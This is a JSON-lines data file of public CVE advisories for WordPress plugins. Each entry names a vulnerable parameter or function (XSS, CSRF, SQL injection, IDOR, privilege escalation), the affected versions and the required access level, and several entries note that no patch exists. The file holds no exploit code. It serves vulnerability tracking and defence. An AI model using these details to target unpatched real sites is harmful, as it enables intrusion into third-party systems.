{"CVE_ID":"CVE-2024-13183","slug":"themeisle-companion","versionImpact":"2.10.43","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title_tag\u2019 parameter in all versions up to, and including, 2.10.43 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/Codeinwp\\\/themeisle-companion\\\/commit\\\/47a17c86934cebbfc3f1a812f1afcaa20515c1f7\",\"name\":\"https:\\\/\\\/github.com\\\/Codeinwp\\\/themeisle-companion\\\/commit\\\/47a17c86934cebbfc3f1a812f1afcaa20515c1f7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219568\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219568\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themeisle-companion\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themeisle-companion\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0f6be2b-5eb6-4828-ae95-7f2253700ee9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0f6be2b-5eb6-4828-ae95-7f2253700ee9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1571","slug":"exclusive-addons-for-elementor","versionImpact":"2.7.6","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Animated Text and Image Comparison Widgets in all versions up to, and including, 2.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245128\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245128\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/exclusive-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/exclusive-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd2ec0b3-2784-4506-99f4-05187527fe6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd2ec0b3-2784-4506-99f4-05187527fe6d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2719","slug":"swatchly","versionImpact":"1.4.0","description":"The Swatchly \u2013 WooCommerce Variation Swatches for Products (product attributes: Image swatch, Color swatches, Label swatches) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_dismiss function in versions 1.2.8 to 1.4.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update option values to 1\/true on the WordPress site. This can be leveraged to update an option that would create an error on the site and deny access to legitimate users or be used to set some values to true, such as registration.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swatchly\\\/tags\\\/1.2.8\\\/includes\\\/Admin\\\/Notices.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swatchly\\\/tags\\\/1.2.8\\\/includes\\\/Admin\\\/Notices.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39336115-5993-49e1-b810-80a712e8e42b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39336115-5993-49e1-b810-80a712e8e42b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3876","slug":"sms-alert","versionImpact":"3.8.1","description":"The SMS Alert Order Notifications \u2013 WooCommerce plugin for WordPress is vulnerable to Privilege Escalation due to insufficient user OTP validation in the handleWpLoginCreateUserAction() function in all versions up to, and including, 3.8.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to impersonate any account by supplying its username or email and elevate their privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/tags\\\/3.8.0\\\/handler\\\/forms\\\/class-wplogin.php#L145\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/tags\\\/3.8.0\\\/handler\\\/forms\\\/class-wplogin.php#L145\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/tags\\\/3.8.0\\\/handler\\\/forms\\\/class-wplogin.php#L447\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/tags\\\/3.8.0\\\/handler\\\/forms\\\/class-wplogin.php#L447\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290478\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290478\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sms-alert\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sms-alert\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cf65f79-d386-4dd4-a360-b2f764dfaf19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cf65f79-d386-4dd4-a360-b2f764dfaf19?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5932","slug":"homerunner-smartcheckout","versionImpact":"1.0.29","description":"The Homerunner plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.29. This is due to missing or incorrect nonce validation on the main_settings() function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/homerunner-smartcheckout\\\/tags\\\/1.0.29\\\/classes\\\/class-settings.php#L319\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/homerunner-smartcheckout\\\/tags\\\/1.0.29\\\/classes\\\/class-settings.php#L319\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36eaff34-50cd-4399-8314-19ae4f50d017?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36eaff34-50cd-4399-8314-19ae4f50d017?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6585","slug":"wp-jobhunt","versionImpact":"7.2","description":"The WP JobHunt plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 7.2 via the cs_remove_profile_callback() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete accounts of other users including admins.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afb3e0e0-68c7-43f6-981f-59c3f3507429?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afb3e0e0-68c7-43f6-981f-59c3f3507429?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0149","slug":"wordprezi","versionImpact":"0.8.2","description":"The WordPrezi WordPress plugin through 0.8.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b6f9e42-7f7f-4daa-99c9-14a24a6d76b0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b6f9e42-7f7f-4daa-99c9-14a24a6d76b0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0761","slug":"clock-in-portal","versionImpact":"2.1","description":"The Clock In Portal- Staff & Attendance Management WordPress plugin through 2.1 does not have CSRF check when deleting Staff members, which could allow attackers to make logged in admins delete arbitrary Staff via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88fb064e-0001-446c-8e43-9fe3feff6c1f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88fb064e-0001-446c-8e43-9fe3feff6c1f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2237","slug":"wp-replicate-post","versionImpact":"4.0.2","description":"The WP Replicate Post plugin for WordPress is vulnerable to SQL Injection via the post_id parameter in versions up to, and including, 4.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for contributor-level attackers or higher to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910474%40wp-replicate-post%2Ftrunk&old=2896518%40wp-replicate-post%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910474%40wp-replicate-post%2Ftrunk&old=2896518%40wp-replicate-post%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/916e6f8b-cb29-4062-9a05-0337cfdb382a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/916e6f8b-cb29-4062-9a05-0337cfdb382a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-replicate-post\\\/trunk\\\/init\\\/functions.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-replicate-post\\\/trunk\\\/init\\\/functions.php#L81\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3525","slug":"integrar-getnet-con-woo","versionImpact":"0.0.4","description":"The Getnet Argentina para Woocommerce plugin for WordPress is vulnerable to authorization bypass due to missing validation on the 'webhook' function in versions up to, and including, 0.0.4. This makes it possible for unauthenticated attackers to set their payment status to 'APPROVED' without payment.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/245e9117-ca63-458e-a094-60a759f5ec19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/245e9117-ca63-458e-a094-60a759f5ec19?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.youtube.com\\\/watch?v=xTyWqh93AM0\",\"name\":\"https:\\\/\\\/www.youtube.com\\\/watch?v=xTyWqh93AM0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5606","slug":"chatbot","versionImpact":"4.9.6","description":"The ChatBot for WordPress is vulnerable to Stored Cross-Site Scripting via the FAQ Builder in versions 4.8.6 through 4.9.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. NOTE: This vulnerability is a re-introduction of CVE-2023-4253.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc305c48-8337-42b7-ad61-61aea8018def?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc305c48-8337-42b7-ad61-61aea8018def?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2987335%40chatbot%2Ftrunk&old=2986133%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2987335%40chatbot%2Ftrunk&old=2986133%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24567","slug":"simple-post","versionImpact":"1.1","description":"The Simple Post WordPress plugin through 1.1 does not sanitize user input when an authenticated user Text value, then it does not escape these values when outputting to the browser leading to an Authenticated Stored XSS Cross-Site Scripting issue.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3cd3115-2181-4e14-8b39-4de096433847\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3cd3115-2181-4e14-8b39-4de096433847\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1860","slug":"antihacker","versionImpact":"4.51","description":"The Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the antihacker_add_whitelist() function in all versions up to, and including, 4.51. This makes it possible for unauthenticated attackers to add their IP Address to the whitelist circumventing protection","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d365284-73ac-4730-a83d-9202677cf161?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d365284-73ac-4730-a83d-9202677cf161?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040434%40antihacker&new=3040434%40antihacker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040434%40antihacker&new=3040434%40antihacker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1393","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.12","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'icon_align' attribute of the Content Switcher widget in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb0888d6-30e6-4957-b270-1968eace462e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb0888d6-30e6-4957-b270-1968eace462e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.12.12\\\/modules\\\/content-switcher\\\/skins\\\/skin-3.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.12.12\\\/modules\\\/content-switcher\\\/skins\\\/skin-3.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13\\\/modules\\\/content-switcher\\\/skins\\\/skin-3.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13\\\/modules\\\/content-switcher\\\/skins\\\/skin-3.php#L39\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3206","slug":"different-menus-in-different-pages","versionImpact":"2.3.2","description":"The Different Menu in Different Pages \u2013 Control Menu Visibility (All in One) plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the ajax() function in all versions up to, and including, 2.3.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to duplicate menus.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f9d4d86-9d5f-4888-9cc4-d55c117ae4ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f9d4d86-9d5f-4888-9cc4-d55c117ae4ea?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/different-menus-in-different-pages\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/duplicate-menus.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/different-menus-in-different-pages\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/duplicate-menus.php#L18\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5152","slug":"element-ready-lite","versionImpact":"6.1.0","description":"The ElementsReady Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_id\u2019 parameter in all versions up to, and including, 6.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2cffdc3-bd74-42ab-befd-8a396c5d990d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2cffdc3-bd74-42ab-befd-8a396c5d990d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/element-ready-lite\\\/trunk\\\/inc\\\/Widgets\\\/info_box\\\/Element_Ready_Info_Box_Widget.php#L742\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/element-ready-lite\\\/trunk\\\/inc\\\/Widgets\\\/info_box\\\/Element_Ready_Info_Box_Widget.php#L742\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8428","slug":"forumwp","versionImpact":"2.0.2","description":"The ForumWP \u2013 Forum & Discussion Board Plugin plugin for WordPress is vulnerable to Privilege Escalation via Insecure Direct Object Reference in all versions up to, and including, 2.0.2 via the submit_form_handler due to missing validation on the 'user_id' user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to change the email address of administrative user accounts which can then be leveraged to reset the administrative users password and gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5818587-0a52-4734-8f75-263b4ab5020e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5818587-0a52-4734-8f75-263b4ab5020e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/trunk\\\/includes\\\/frontend\\\/class-actions-listener.php#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/trunk\\\/includes\\\/frontend\\\/class-actions-listener.php#L179\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8430","slug":"spice-starter-sites","versionImpact":"1.2.5","description":"The Spice Starter Sites plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the spice_starter_sites_importer_creater function in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to import demo content.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec52337f-bdd1-4632-853b-da86d64751e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec52337f-bdd1-4632-853b-da86d64751e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spice-starter-sites\\\/tags\\\/1.2.5\\\/spice-starter-sites.php#L1123\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spice-starter-sites\\\/tags\\\/1.2.5\\\/spice-starter-sites.php#L1123\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10837","slug":"customize-my-account-for-woocommerce","versionImpact":"2.7.29","description":"The SysBasics Customize My Account for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018tab\u2019 parameter in all versions up to, and including, 2.7.29 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ced1c79-97fe-4841-9a02-ffb9f336212a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ced1c79-97fe-4841-9a02-ffb9f336212a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customize-my-account-for-woocommerce\\\/tags\\\/2.7.19\\\/phppoet-checkout-fields\\\/include\\\/admin\\\/pcfme_admin_settings.php#L840\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customize-my-account-for-woocommerce\\\/tags\\\/2.7.19\\\/phppoet-checkout-fields\\\/include\\\/admin\\\/pcfme_admin_settings.php#L840\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/customize-my-account-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/customize-my-account-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183607\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183607\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11442","slug":"horizontal-scroll-image-slideshow","versionImpact":"10.1","description":"The Horizontal scroll image slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'horizontal-scroll-image-slideshow' shortcode in all versions up to, and including, 10.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scroll-image-slideshow\\\/trunk\\\/horizontal-scroll-image-slideshow.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scroll-image-slideshow\\\/trunk\\\/horizontal-scroll-image-slideshow.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/horizontal-scroll-image-slideshow\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/horizontal-scroll-image-slideshow\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/050d0352-c0a5-41b0-bf40-914f6bf7cba4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/050d0352-c0a5-41b0-bf40-914f6bf7cba4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0311","slug":"themeisle-companion","versionImpact":"2.10.43","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Table widget in all versions up to, and including, 2.10.43 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/Codeinwp\\\/themeisle-companion\\\/commit\\\/47a17c86934cebbfc3f1a812f1afcaa20515c1f7\",\"name\":\"https:\\\/\\\/github.com\\\/Codeinwp\\\/themeisle-companion\\\/commit\\\/47a17c86934cebbfc3f1a812f1afcaa20515c1f7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/Codeinwp\\\/themeisle-companion\\\/commit\\\/c311050b372cf38e82d8ec9deadf4f21a8931487\",\"name\":\"https:\\\/\\\/github.com\\\/Codeinwp\\\/themeisle-companion\\\/commit\\\/c311050b372cf38e82d8ec9deadf4f21a8931487\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1024\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1024\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219568\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219568\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themeisle-companion\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themeisle-companion\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d17a3a0-3c09-4d67-96d6-d97bde92f100?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d17a3a0-3c09-4d67-96d6-d97bde92f100?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
